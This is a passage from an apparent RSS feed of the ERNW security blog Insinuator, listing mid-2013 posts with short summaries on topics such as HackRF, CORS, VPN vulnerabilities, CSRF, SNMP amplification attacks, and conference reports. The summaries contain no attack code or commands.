      <description>&lt;p&gt;&lt;strong&gt;Dear readers,&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;today we welcomed &lt;a href=&#34;http://www.ossmann.com/mike/&#34;&gt;Michael Ossmann&lt;/a&gt; at the &lt;a href=&#34;https://www.ernw.de/&#34;&gt;ERNW&lt;/a&gt; headquarter for an exclusive workshop on his &lt;a href=&#34;http://www.kickstarter.com/projects/mossmann/hackrf-an-open-source-sdr-platform&#34;&gt;HackRF&lt;/a&gt; gadget. Everybody was quite excited to get hands-on with this shiny piece of hardware, which is currently &lt;a href=&#34;http://www.kickstarter.com/projects/mossmann/hackrf-an-open-source-sdr-platform&#34;&gt;crowd-funded on Kickstarter&lt;/a&gt;. For everybody who’s not familiar with &lt;a href=&#34;http://en.wikipedia.org/wiki/Software-defined_radio&#34;&gt;Software Defined Radio&lt;/a&gt; (SDR): Let’s regard it as the ultimate tool when working with radio signals.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2013/08/mike.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2013/08/mike-218x300.jpg&#34; alt=&#34;Michael Ossmann&#34;&gt;&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;Michael Ossmann in the house.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Let’s quote Michael’s campaign website:&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;blockquote&gt;&#xA;&lt;p&gt;&lt;em&gt;Transmit or receive any radio signal from 30 MHz to 6000 MHz on USB power with HackRF. HackRF is an open source hardware project to build a Software Defined Radio (SDR) peripheral.&lt;/em&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Security Impacts of HTML5 CORS or How to use a Browser as a Proxy</title>
      <link>https://insinuator.net/2013/08/some-security-impacts-of-html5-cors-or-how-to-use-a-browser-as-a-proxy/</link>
      <pubDate>Mon, 26 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/some-security-impacts-of-html5-cors-or-how-to-use-a-browser-as-a-proxy/</guid>
      <description>&lt;p&gt;With HTML 5 the current web development moves from server side generated content and layout to client side generated. Most of the so called &lt;em&gt;HTML5 powered&lt;/em&gt; websites use JavaScript and CSS for generating beautiful looking and responsive user experiences. This ultimately leads to the point were developers want to include or request third-party resources. &lt;em&gt;Un&lt;/em&gt;fortunately all current browsers prevent scripts to request external resources through a security feature called the &lt;em&gt;Same-Origin-Policy&lt;/em&gt;. This policy specifies that client side code could only request resources from the domain being executed from. This means that a script from example.com can not load a resource from google.com via AJAX(XHR/XmlHttpRequest).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Team 2.0</title>
      <link>https://insinuator.net/2013/08/security-team-2.0/</link>
      <pubDate>Sat, 24 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/security-team-2.0/</guid>
      <description>&lt;p&gt;I’m currently catching up on a lot of papers and presentation from the &lt;a href=&#34;https://www.usenix.org/conference/usenixsecurity13&#34;&gt;Usenix Security Symposium&lt;/a&gt; in order to finish the blog post series I started last week (summarizing &lt;a href=&#34;http://www.insinuator.net/2013/08/woot13/&#34;&gt;WOOT&lt;/a&gt; and &lt;a href=&#34;http://www.insinuator.net/2013/08/leet13/&#34;&gt;LEET&lt;/a&gt;). One presentation, which unfortunately is  not available online [edit: see also update, &lt;a href=&#34;https://www.usenix.org/conference/usenixsecurity13/security-team-20&#34;&gt;videos&lt;/a&gt; are available now], included several particularly relevant messages that I want to share in this dedicated post. Chris Evans, the head of the Google Chrome security team (herein short: GCST), described some new approaches they employed for their security team operations, some lessons learned, and how others can benefit from it as well (actually the potential of these messages to make the world a safer place was my motivation to write this post, even though I got teased for supposedly being a Google fanboy 😉 ):&lt;/p&gt;</description>
    </item>
    <item>
      <title>SLES 11 Hardening Guide</title>
      <link>https://insinuator.net/2013/08/sles-11-hardening-guide/</link>
      <pubDate>Thu, 15 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/sles-11-hardening-guide/</guid>
      <description>&lt;p&gt;SUSE Linux Enterprise Server (SLES) has been around since 2000. As it is designed to be used in an enterprise environment the security of these systems must be kept at a high level. SLES implements a lot of basic security measures that are common in most Linux systems, but are these enough to protect your business? We think that with a little effort you can raise the security of your SLES installation a lot.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerabilities &amp;amp; attack vectors of VPNs (Pt 1)</title>
      <link>https://insinuator.net/2013/08/vulnerabilities-amp-attack-vectors-of-vpns-pt-1/</link>
      <pubDate>Thu, 15 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/vulnerabilities-amp-attack-vectors-of-vpns-pt-1/</guid>
      <description>&lt;p&gt;This is the first part of an article that will give an overview of known vulnerabilities and potential attack vectors against commonly used Virtual Private Network (VPN) protocols and technologies. This post will cover vulnerabilities and mitigation controls of the Point-to-Point Tunneling Protocol (PPTP) and IPsec. The second post will cover SSL-based VPNs like OpenVPN and the Secure Socket Tunneling Protocol (SSTP). As surveillance of Internet communications has become an important issue, besides the traditional goals of information security, typically referred as  confidentiality, integrity and authenticity, another security goal has become explicitly desirable: Perfect Forward Secrecy (PFS). PFS may be achieved if the initial session-key agreement generates unique keys for each session. This ensures that even if the private key would be compromised, older sessions (that one may have captured) can’t be decrypted. The concept of PFS will be covered in the second post.&lt;/p&gt;</description>
    </item>
    <item>
      <title>WOOT’13</title>
      <link>https://insinuator.net/2013/08/woot13/</link>
      <pubDate>Wed, 14 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/woot13/</guid>
      <description>&lt;p&gt;Continuing &lt;a href=&#34;http://www.insinuator.net/2013/08/leet13/&#34;&gt;yesterday’s post&lt;/a&gt;, I compiled a short summary of relevant &lt;a href=&#34;https://www.usenix.org/conference/woot13/tech-schedule/workshop-program&#34;&gt;WOOT’13&lt;/a&gt; presentations.&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;&lt;em&gt;Truncating TLS Connections to Violate Beliefs in Web Applications&lt;/em&gt;&lt;br&gt;&#xA;&lt;em&gt;Ben Smyth and Alfredo Pironti, INRIA Paris-Rocquencourt&lt;/em&gt;&lt;/p&gt;&#xA;&lt;p&gt;This presentation was also given at &lt;a href=&#34;https://media.blackhat.com/us-13/US-13-Smyth-Truncating-TLS-Connections-to-Violate-Beliefs-in-Web-Applications-Slides.pdf&#34;&gt;BlackHat&lt;/a&gt; some weeks ago. It outlines a very interesting class of attacks against web applications abusing the TLS specification which states that “failure to properly close a connection no longer requires that a session not be resumed […] to conform with widespread implementation practice”. This characteristic enables new attack vectors on shared systems where certain outgoing (TLS encrypted) packets can be dropped in order to prevent applications from e.g. correctly finishing transaction (such as log out procedures) or even modifying the request bodies by dropping the last parts.&lt;/p&gt;</description>
    </item>
    <item>
      <title>LEET’13</title>
      <link>https://insinuator.net/2013/08/leet13/</link>
      <pubDate>Tue, 13 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/leet13/</guid>
      <description>&lt;p&gt;I have the pleasure to visit this year’s &lt;a href=&#34;https://www.usenix.org/conference/usenixsecurity13&#34;&gt;USENIX Security Symposium&lt;/a&gt; in Washington, DC. Besides the nice venue close to the &lt;a href=&#34;http://en.wikipedia.org/wiki/National_mall&#34;&gt;national mall&lt;/a&gt;, there are also several co-located workshops. Every night I will try and provide a summary of those presentations I regard as most interesting. However, I hope to manage to keep up with it as there are a lot of interesting events, people to meet, and still some projects to keep up with. The short summaries below are from the &lt;em&gt;6th USENIX Workshop on Large-Scale Exploits and Emergent Threats&lt;/em&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>MFD Vulnerabilities</title>
      <link>https://insinuator.net/2013/08/mfd-vulnerabilities/</link>
      <pubDate>Wed, 07 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/mfd-vulnerabilities/</guid>
      <description>&lt;p&gt;A recent &lt;a href=&#34;http://seclists.org/bugtraq/2013/Aug/28&#34;&gt;post&lt;/a&gt; describing some nasty vulnerabilities in HP &lt;a href=&#34;http://www.google.de/search?hl=en&amp;amp;site=imghp&amp;amp;tbm=isch&amp;amp;source=hp&amp;amp;biw=1276&amp;amp;bih=663&amp;amp;q=multifunction+device&amp;amp;oq=multifunction+device&amp;amp;gs_l=img.3..0j0i5j0i24l7.2450.5517.0.5606.20.15.0.4.4.0.99.959.15.15.0....0...1ac.1.24.img..1.19.973.43a2mDdYMDE&#34;&gt;multifunction devices&lt;/a&gt; (MFDs) brings back memories of a &lt;a href=&#34;https://www.troopers.de/wp-content/uploads/2011/04/TR11_Schaefer_Luft_Multifunction_devices.pdf&#34;&gt;presentation&lt;/a&gt; Micele and I gave at &lt;a href=&#34;https://www.troopers.de/archives/troopers11&#34;&gt;Troopers11&lt;/a&gt; on MFD security. The published vulnerabilities are highly relevant  (such as unauthenticated retrieval of administrative credentials) and reminded me of some of the basic recommendations we gave. MFD vulnerabilities are regularly discovered, and it is often basic stuff such as hardcoded $SECRET_INFORMATION (don’t get me wrong here, I fully appreciate the quality of the published research, but it is just surprising — let’s go with this attribute 😉 — that those types of vulnerabilities still occur that often). Yet many environments &lt;em&gt;do not&lt;/em&gt; patch their MFDs or implement other controls. As it is not an option to not use MFDs (they are already present in pretty much every environment, and the vast majority of vendors periodically suffer from vulnerabilities), let’s recall some of our recommendations as those would have mitigated the risk resulting from the published vulnerability:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Cross-Site Request Forgery with Cross-Origin Resource Sharing</title>
      <link>https://insinuator.net/2013/08/cross-site-request-forgery-with-cross-origin-resource-sharing/</link>
      <pubDate>Fri, 02 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/cross-site-request-forgery-with-cross-origin-resource-sharing/</guid>
      <description>&lt;p&gt;During one of our last projects in a large environment we encountered an interesting flaw. Although it was not possible to exploit it in this particular context, it’s worth to be mentioned here. The finding was about &lt;a href=&#34;https://www.owasp.org/index.php/CSRF&#34; title=&#34;OWASP CSRF&#34;&gt;Cross-Site Request Forgery&lt;/a&gt;, a quite well-known attack that forces a user to execute unintended actions within the authenticated context of a web application. With a little help of social engineering (like sending a link via email, chat, embedded code in documents, etc…) an attacker may force the user to execute actions of the attacker’s choice.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Hackers Meeting @ IETF 87 in Berlin / Slides</title>
      <link>https://insinuator.net/2013/08/ipv6-hackers-meeting-@-ietf-87-in-berlin-/-slides/</link>
      <pubDate>Thu, 01 Aug 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/08/ipv6-hackers-meeting-@-ietf-87-in-berlin-/-slides/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.ipv6hackers.org/meetings/berlin-2013&#34;&gt;That meeting&lt;/a&gt; was actually a great event. Once more, big thanks! to Fernando for organizing it and to &lt;a href=&#34;http://www.eantc.com/&#34;&gt;EANTC&lt;/a&gt; for providing the logistics.&lt;br&gt;&#xA;A couple of unordered notes to follow:&lt;/p&gt;&#xA;&lt;p&gt;a) The slides of our contribution can be found &lt;a href=&#34;http://www.ernw.de/download/ERNW_IETF87_IPv6Hackers_Capabilities_v0_9.pdf&#34;&gt;here&lt;/a&gt;. Again, pls note that this is work in progress and we’re happy to receive any kind of feedback.&lt;br&gt;&#xA;[given Fernando explicitly mentioned Troopers, we’ve allowed ourselves to put some reference to it into this version of the slide deck…]&lt;/p&gt;</description>
    </item>
    <item>
      <title>Basic OS X Hardening &amp; DMA</title>
      <link>https://insinuator.net/2013/07/basic-os-x-hardening-dma/</link>
      <pubDate>Wed, 31 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/basic-os-x-hardening-dma/</guid>
      <description>&lt;p&gt;In the course of a recent endpoint assessment, we also had a OS X 10.8 client system as a target. While we still rely on the Firewire “capability” of unlocking systems on a regular base (using &lt;a href=&#34;http://www.breaknenter.org/projects/inception/&#34;&gt;this great tool&lt;/a&gt;), we noticed that Apple released a &lt;a href=&#34;http://support.apple.com/kb/HT5002&#34;&gt;patch&lt;/a&gt; to disable Firewire DMA access whenever the system is in a &lt;em&gt;locked&lt;/em&gt; state (e.g. with an active screensaver or no user logged in). As we test the Firewire DMA access vulnerability quite often (at least we thought so 😉 ) to prepare for demonstrations in the board room or client assessments, we were quite surprised that we must have actually missed that nice update. In order to verify the effectiveness of the patch, we ran our typical test bed and can quite happily confirm that the update successfully mitigates Firewire DMA access in locked system states.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SNMP Reflected Amplification DDoS Attacks</title>
      <link>https://insinuator.net/2013/07/snmp-reflected-amplification-ddos-attacks/</link>
      <pubDate>Wed, 31 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/snmp-reflected-amplification-ddos-attacks/</guid>
      <description>&lt;p&gt;Just recently on the NANOG mailing list a discussion popped up titled “&lt;a href=&#34;http://mailman.nanog.org/pipermail/nanog/2013-July/060094.html&#34;&gt;SNMP DDoS: the vulnerability you might not know you have&lt;/a&gt;“.&lt;br&gt;&#xA;There’s a couple of points here:&lt;/p&gt;&#xA;&lt;p&gt;a) if you’re interested in the technical details of these attacks (and mitigation advice), pls see &lt;a href=&#34;http://www.bitag.org/documents/SNMP-Reflected-Amplification-DDoS-Attack-Mitigation.pdf&#34;&gt;this excellent technical&lt;/a&gt; report the Broadband Internet Technical Advisory Group published last year (apparently Comcast &lt;a href=&#34;ttp://corporate.comcast.com/comcast-voices/taking-steps-to-prevent-unintentional-network-abuse&#34;&gt;had observed&lt;/a&gt; such attacks before).&lt;/p&gt;&#xA;&lt;p&gt;b) Daniel and I gave a &lt;a href=&#34;https://www.ernw.de/download/ERNW_HITB_Dubai_2007_Attacking_SNMP.pdf&#34;&gt;talk on attacking SNMP&lt;/a&gt; at HITB Dubai 2007 (&lt;a href=&#34;http://conference.hitb.org/&#34;&gt;Hi Amy &amp;amp; Dhillon! 😉&lt;/a&gt;) laying out the basic idea for that type of attack and we later described it in a bit more detail at &lt;a href=&#34;http://www.shmoocon.org/shmoocon_2009&#34;&gt;ShmooCon 2009&lt;/a&gt; where we even demoed it publicly (camera recording stopped at that point, for obvious reasons). We used (a slightly modified version of) &lt;a href=&#34;https://www.ernw.de/download/snmpattack.pl&#34;&gt;this tool&lt;/a&gt;.&lt;br&gt;&#xA;From the research we did at the time we can confirm this was/presumably still is a huge problem, at least for European carriers’ broadband segments (acting as amplifiers).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Responsible Disclosure and Academic Freedom, Again</title>
      <link>https://insinuator.net/2013/07/responsible-disclosure-and-academic-freedom-again/</link>
      <pubDate>Sat, 27 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/responsible-disclosure-and-academic-freedom-again/</guid>
      <description>&lt;p&gt;Reading &lt;a href=&#34;http://www.guardian.co.uk/technology/2013/jul/26/scientist-banned-revealing-codes-cars&#34;&gt;this article&lt;/a&gt; from the Guardian,  on &lt;a href=&#34;http://www.cs.ru.nl/~flaviog/&#34;&gt;this guy&lt;/a&gt; apparently being banned from fully discussing research results in &lt;a href=&#34;https://www.usenix.org/conference/usenixsecurity13/dismantling-megamos-crypto-wirelessly-lockpicking-vehicle-immobilizer&#34;&gt;his talk&lt;/a&gt; at upcoming &lt;a href=&#34;https://www.usenix.org/conference/usenixsecurity13&#34;&gt;USENIX Security&lt;/a&gt;, leaves me scratching my head once more. Things might (as so often) be more complex than they seem, but this looks like yet-another misconception as for the contribution of security research (and its public discussion) to the greater good of us all. Which is unfortunate for the speakers (I’ve been in a similar situation once, receiving a threatening legal letter from a very large organization one day before one of our Black Hat presentations and can tell you that stuff like that doesn’t add to one’s anticipation of the talk or the event…), for the audience (including some ERNW guys who will be a USENIX-SEC, so, btw, expect a summary post here) and for the whole community of security researchers.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Hackers Meeting @ IETF 87, Berlin</title>
      <link>https://insinuator.net/2013/07/ipv6-hackers-meeting-@-ietf-87-berlin/</link>
      <pubDate>Fri, 26 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/ipv6-hackers-meeting-@-ietf-87-berlin/</guid>
      <description>&lt;p&gt;Next to &lt;a href=&#34;https://www.ietf.org/meeting/87/index.html&#34;&gt;IETF 87&lt;/a&gt; going on in Berlin in a few days there will be an &lt;a href=&#34;http://www.ipv6hackers.org/meetings/berlin-2013&#34;&gt;informal meeting of the “IPv6 Hackers”&lt;/a&gt; on Tuesday. We really look forward to personally meet a number of people who we (so far) only know from the associated &lt;a href=&#34;http://www.si6networks.com/community/mailing-lists.html&#34;&gt;mailing list&lt;/a&gt; or similar machine-enhanced exchange. We hope to contribute as well. Based on the stuff of &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-workshop-overview-of-the-real-world-capabilities-of-major-commercial-security-products/index.html&#34;&gt;this workshop&lt;/a&gt; from the &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-ipv6-security-summit-2013/index.html&#34;&gt;IPv6 Security Summit&lt;/a&gt; at &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers13&lt;/a&gt; we might give a short project presentation along the lines of “Some Notes on Testing the Real-World IPv6 Capabilities of Commercial Security Products”, providing an overview of some testing done on commercial gear, together with a discussion of testing approaches, tools and key aspects.&lt;/p&gt;</description>
    </item>
    <item>
      <title>BlackBerry 10 USB Modes</title>
      <link>https://insinuator.net/2013/07/blackberry-10-usb-modes/</link>
      <pubDate>Tue, 23 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/blackberry-10-usb-modes/</guid>
      <description>&lt;p&gt;So we got these shiny new BlackBerry Q10 and Z10 device laying on the desk one morning. It’s my first BlackBerry, I have to admit, but never the less, the hole wushy GUI and touchy glass stuff wasn’t my main concern, instead i &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-presentations/index.html#you_wouldnt_share&#34;&gt;took a look at the stuff&lt;/a&gt; going on while you connect the phone (do i have to call it blackberry? its a phone, isn’t it?) to your computer.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Some Notes on Types of Security Controls &amp; the Way they’re Implemented in Enterprise Environments</title>
      <link>https://insinuator.net/2013/07/some-notes-on-types-of-security-controls-the-way-theyre-implemented-in-enterprise-environments/</link>
      <pubDate>Sun, 21 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/some-notes-on-types-of-security-controls-the-way-theyre-implemented-in-enterprise-environments/</guid>
      <description>&lt;p&gt;Welcome back, Dear Reader,&lt;/p&gt;&#xA;&lt;p&gt;in this post I’d like to share some reflections on the (potentially inefficient) way some security controls can be observed to be deployed in complex organisations and what this may mean for the future of those controls.&lt;/p&gt;&#xA;&lt;p&gt;In general the space of security controls can be categorized according to different schemes, such as:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;By fundamental principle (preventive, detective, reactive, corrective, deterrent, compensating etc. security controls. see for example this &lt;a href=&#34;http://www.sans.edu/research/security-laboratory/article/security-controls&#34;&gt;overview&lt;/a&gt; or &lt;a href=&#34;http://www.mhprofessional.com/downloads/products/0072254238/0072254238_ch01.pdf&#34;&gt;this one&lt;/a&gt; or some illustration &lt;a href=&#34;https://www.troopers.de/wp-content/uploads/2012/10/TROOPERS09_rey_keynote_stop_the_madness.pdf&#34;&gt;here&lt;/a&gt;).&lt;/li&gt;&#xA;&lt;li&gt;By “state of matter” (e.g. components, implementation, operations. again, for some supplemental information look at &lt;a href=&#34;https://www.troopers.de/wp-content/uploads/2012/10/TROOPERS09_rey_keynote_stop_the_madness.pdf&#34;&gt;this one&lt;/a&gt;).&lt;/li&gt;&#xA;&lt;li&gt;By type of admission: whitelisting vs. blacklisting (some general discussion &lt;a href=&#34;http://kevtownsend.wordpress.com/2011/08/24/whitelisting-vs-blacklisting/&#34;&gt;here&lt;/a&gt;, the respective Schneier-Ranum Face-Off to be found &lt;a href=&#34;http://searchsecurity.techtarget.com/magazineContent/Schneier-Ranum-Face-Off-on-whitelisting-and-blacklisting&#34;&gt;here&lt;/a&gt;, and &lt;a href=&#34;http://www.schneier.com/blog/archives/2011/01/whitelisting_vs.html&#34;&gt;this&lt;/a&gt; is only Bruce’s half, but with a number of comments).&lt;/li&gt;&#xA;&lt;li&gt;Related to the overall architecture of implementation: centralized vs. distributed.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;For today’s topic I’ll just focus on the latter two and will introduce those shortly.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Ganz Gallien?</title>
      <link>https://insinuator.net/2013/07/ganz-gallien/</link>
      <pubDate>Sun, 14 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/ganz-gallien/</guid>
      <description>&lt;p&gt;“Nein! Ein von unbeugsamen Galliern bevölkertes Dorf hört nicht auf, dem Eindringling Widerstand zu leisten.”&lt;/p&gt;&#xA;&lt;p&gt;This is a famous quote pretty much every German kid used to know. Not sure if this still applies though, my three haven’t touched Asterix comics so far. Anyhow, you might ask why I cite this.&lt;/p&gt;&#xA;&lt;p&gt;Simple answer: see &lt;a href=&#34;http://www.guardian.co.uk/world/2013/jul/09/xmission-isp-customers-privacy-nsa&#34;&gt;this recent article&lt;/a&gt; from the Guardian on a Utah-based ISP “resisting some pressure”. That’s the spirit…&lt;/p&gt;&#xA;&lt;p&gt;Have a great Sunday everybody,&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pre-Weekend Goody: TROOPERS13 Video</title>
      <link>https://insinuator.net/2013/07/pre-weekend-goody-troopers13-video/</link>
      <pubDate>Thu, 11 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/pre-weekend-goody-troopers13-video/</guid>
      <description>&lt;p&gt;Enjoy! After seeing this I personally feel like signing up for the &lt;a href=&#34;https://www.troopers.de/index.html&#34;&gt;TROOPERS14 Enthusiast Package&lt;/a&gt; 😉&lt;/p&gt;&#xA;&lt;p&gt;Carry on&lt;br&gt;&#xA;Florian &amp;amp; Team&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reverse Engineering Tools Part 1: BinDiff</title>
      <link>https://insinuator.net/2013/07/reverse-engineering-tools-part-1-bindiff/</link>
      <pubDate>Mon, 08 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/reverse-engineering-tools-part-1-bindiff/</guid>
      <description>&lt;p&gt;&lt;em&gt;When teaching courses on topics like Reverse Engineering or Malware Analysis we always emphasize the need to minimize unneeded work. Because reversing an unknown binary is a time consuming and complex process, tools that simplify the RE process are invaluable when working under time pressure. In this blogpost series I will present multiple tools and techniques that can help to reverse an unknown binary. Please note that these articles do not contain cutting edge research but rather target at newcomers. However, I hope to also provide some useful and interesting information for moreexperienced practitioners.&lt;/em&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>EMET v4.0 with New Certificate Trust Feature Released</title>
      <link>https://insinuator.net/2013/07/emet-v4.0-with-new-certificate-trust-feature-released/</link>
      <pubDate>Mon, 01 Jul 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/07/emet-v4.0-with-new-certificate-trust-feature-released/</guid>
      <description>&lt;p&gt;Microsoft released &lt;a href=&#34;http://www.microsoft.com/en-us/download/details.aspx?id=39273&#34;&gt;EMET v4.0&lt;/a&gt;  with a new (security) feature that enables protection against fraudulent websites or compromised root certification authorities (do you remember Comodo, DigiNotar, DigiCert, Turktrust et al. ;-)?)&lt;/p&gt;&#xA;&lt;p&gt;EMET defines via “certificate trust“ a trust chain between the domain name of a website (and its associated website certificate) and a root CA certificate. This is done through so called “pinning rules”. Here is one of the default pinning rules of EMET 4.0 for the domain name &lt;em&gt;login.live.com&lt;/em&gt;:&lt;/p&gt;</description>
    </item>
    <item>
      <title>TROOPERS14 Registration Open &#43; TROOPERS13 Photos Online</title>
      <link>https://insinuator.net/2013/06/troopers14-registration-open--troopers13-photos-online/</link>
      <pubDate>Sun, 30 Jun 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/06/troopers14-registration-open--troopers13-photos-online/</guid>
      <description>&lt;p&gt;**Dear blog followers, TROOPERS speakers &amp;amp; attendees,&lt;br&gt;&#xA;**we hope you’re doing fine! Today we have a couple of great things to share with you:&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;TROOPERS14&lt;/strong&gt;&lt;br&gt;&#xA;Let’s start with a date. Get your calendar and mark &lt;strong&gt;March 17th – 21st 2014&lt;/strong&gt;. It’s your TROOPERS14 holidays. One week full of high-end education, workshops, talks, reconnecting with friends, action, delicious food and one or the other party. You know the drill – more details further down.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Slides &amp; Scripts from Antonios Atlasis’ “Advanced Attack Techniques against IPv6 Networks” Workshop</title>
      <link>https://insinuator.net/2013/06/slides-scripts-from-antonios-atlasis-advanced-attack-techniques-against-ipv6-networks-workshop/</link>
      <pubDate>Tue, 25 Jun 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/06/slides-scripts-from-antonios-atlasis-advanced-attack-techniques-against-ipv6-networks-workshop/</guid>
      <description>&lt;p&gt;After his great presentations on &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-presentations/index.html#extension_headers&#34;&gt;IPv6 Extensions Headers&lt;/a&gt; and &lt;a href=&#34;https://www.troopers.de/archives/troopers13/agenda13/troopers13-ipv6-security-summit-2013/troopers13-ipv6-security-summit-2013-presentations/index.html#fragmentation_overlapping&#34;&gt;security problems related to fragmentation&lt;/a&gt; we had invited Antonios Atlasis to Heidelberg to give  &lt;a href=&#34;https://www.ernw.de/wp-content/uploads/M44b-Advanced_Attack_Techniques_24-06-2013_Heidelberg.pdf&#34;&gt;this workshop&lt;/a&gt; at ERNW. It was a great experience with many fruitful discussions between the participants (mostly security practitioners from very large organizations planning to have their Internet edge IPv6 enabled within the next 6-12 months) and him/us. Antonios thankfully decided to make his &lt;a href=&#34;https://www.ernw.de/download/Advanced%20Attack%20Techniques%20against%20IPv6%20Networks-final.pdf&#34;&gt;slides&lt;/a&gt; and &lt;a href=&#34;https://www.ernw.de/download/Advanced_Attack_Techniques_Scripts.zip&#34;&gt;scripts&lt;/a&gt; available for those interested in further research on the topics (it should be noted that the scripts have not been tested thoroughly and he’s happy to receive feedback of any kind at antoniosDOTatlasisDOTgmailDOTcom). Today Marc (Heuse) gives &lt;a href=&#34;https://www.ernw.de/wp-content/uploads/M44a-PentestWorkshop_25-06-2013_Heidelberg.pdf&#34;&gt;his workshop&lt;/a&gt; on pentesting in the IPv6 age. Hopefully such events help to move things into the right direction in the IPv6 security space…&lt;/p&gt;</description>
    </item>
    <item>
      <title>Microsoft Doc “Best Practices for Securing Active Directory”</title>
      <link>https://insinuator.net/2013/06/microsoft-doc-best-practices-for-securing-active-directory/</link>
      <pubDate>Wed, 05 Jun 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/06/microsoft-doc-best-practices-for-securing-active-directory/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;MS just &lt;a href=&#34;http://blogs.technet.com/b/security/archive/2013/06/03/microsoft-releases-new-mitigation-guidance-for-active-directory.aspx&#34;&gt;released&lt;/a&gt; a new guide on securing Active Directory. At the first glance seems a fairly comprehensive document to me.&lt;/p&gt;&#xA;&lt;p&gt;At this occasion I may furthermore draw your attention to our (German language) &lt;a href=&#34;https://www.ernw.de/wp-content/uploads/ERNW_Newsletter_40_AD_SRV2008R2_BSI_compliant_de_signed.pdf&#34;&gt;newsletter no. 40&lt;/a&gt; covering hardening MS Windows Server 2008 + AD.&lt;/p&gt;&#xA;&lt;p&gt;have a good one,&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>Impressions from the Google I/O Con</title>
      <link>https://insinuator.net/2013/06/impressions-from-the-google-i/o-con/</link>
      <pubDate>Tue, 04 Jun 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/06/impressions-from-the-google-i/o-con/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2013/05/moscone.jpg&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2013/05/moscone.jpg&#34; alt=&#34;moscone&#34;&gt;&lt;/a&gt;&lt;br&gt;&#xA;From 15th – 17th of May, the sixth Google I/O conference took place in San Francisco, California and I was one of the lucky guys attending. More then 5500 people, primarily web, mobile, and enterprise developers, attended this annual event. A lot of presentations included announcements of new and exciting technologies, APIs as well as of two new devices.&lt;/p&gt;&#xA;&lt;p&gt;During the first minutes of the &lt;a href=&#34;https://developers.google.com/events/io/&#34; title=&#34;Google I/O 2013 Keynote&#34;&gt;keynote&lt;/a&gt; some of Google’s managers announced that by now over 900 million Android devices are activated and that 48 billion apps are installed, which demonstrates that this market is still heavily growing. As the major part of the audience were (app-) developers, these numbers were received quite greatfully and euphoric.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers13 Videos Online</title>
      <link>https://insinuator.net/2013/06/troopers13-videos-online/</link>
      <pubDate>Sat, 01 Jun 2013 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2013/06/troopers13-videos-online/</guid>
